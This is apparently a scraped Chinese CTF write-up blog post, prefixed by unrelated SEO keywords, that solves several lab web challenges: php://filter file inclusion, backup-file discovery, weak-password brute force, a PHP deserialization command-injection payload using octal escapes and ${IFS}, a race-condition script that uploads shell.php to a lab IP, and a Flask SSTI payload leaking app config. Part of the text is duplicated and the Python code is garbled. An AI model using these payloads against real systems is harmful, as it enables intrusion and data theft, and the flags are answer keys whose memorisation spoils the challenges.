个人网站审批,管理学课程,谈网站优化的外部链接质量,腾讯企业邮箱怎么申请题目名称-文件包含
今天的题大概提一下解题思路就好了 这里要使用php://filter 在此基础上因为网页过滤了一些关键字 我们要进行爆破
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII…题目名称-文件包含
今天的题大概提一下解题思路就好了 这里要使用php://filter 在此基础上因为网页过滤了一些关键字 我们要进行爆破
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
就得到了cyberpeace{d85dfd5b23264ede9fc8e1f9bc93a382}
back up
这是一个备份文件的题
/index.php.bak
常见备份文件后缀 :
.git .svn .swp .~ .bak .bash_history .bak weak_auth
题目描述告诉我们随手设的密码 所以可能是弱密码 我们可以直接进行爆破 很轻松就得到了flag
unseping 又是php代码的审计 这跟昨天写的差不多 都是base编码后反序列化传入 我们中间可以使用正则绕过
wp的payload
$a new ease(ping,array($(printf${IFS}\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160))); wzsc_文件上传
import requests
import threading
import osclass RaceCondition(threading.Thread):def __init__(self):threading.Thread.__init__(self)self.url http://61.147.171.105:62418/upload/a.phpself.uploadUrl http://61.147.171.105:62418/upload/shell.phpdef _get(self):print(try to call uploaded file...)r requests.get(self.url)if r.status_code 200:print([*] create file shell.php success.)os._exit(0)def _upload(self):print(upload file...)rs requests.get(self.uploadUrl)if rs.status_code 200:print([*] create file shell.php success.)os._exit(0)def run(self):while True:for i in range(5):self._get()for i in range(10):self._upload()self._get()if __name__ __main__:threads 50for i in range(threads):t RaceCondition()t.start()for i in range(threads):t.join()
这道题我的蚁剑有问题 所以只放了wp的脚本 但我的文件上传也一直不成功
shrine 不规则 我们查看源码 61.147.171.105:64225/shrine/%7B%7Bget_flashed_messages.globals[current_app].config%7D%7D 这是在shrine路径下的ssti注入由于过滤了config 和self,可以用get_flashed_messages函数
SSTI
是一种Web应用漏洞攻击者通过注入恶意模板代码使服务器在渲染模板时执行这些代码从而导致敏感信息泄露、代码执行、命令执行等问题
SSTI漏洞的产生主要是因为Web应用程序在使用模板引擎时未对用户输入进行严格过滤或验证直接将用户输入作为模板内容的一部分进行渲染
get_flashed_messages函数
是 Flask 框架中用于获取闪现消息Flash Messages的函数。闪现消息是一种在请求结束时记录消息并在下一个请求中访问这些消息的机制通常用于在重定向后显示一次性消息
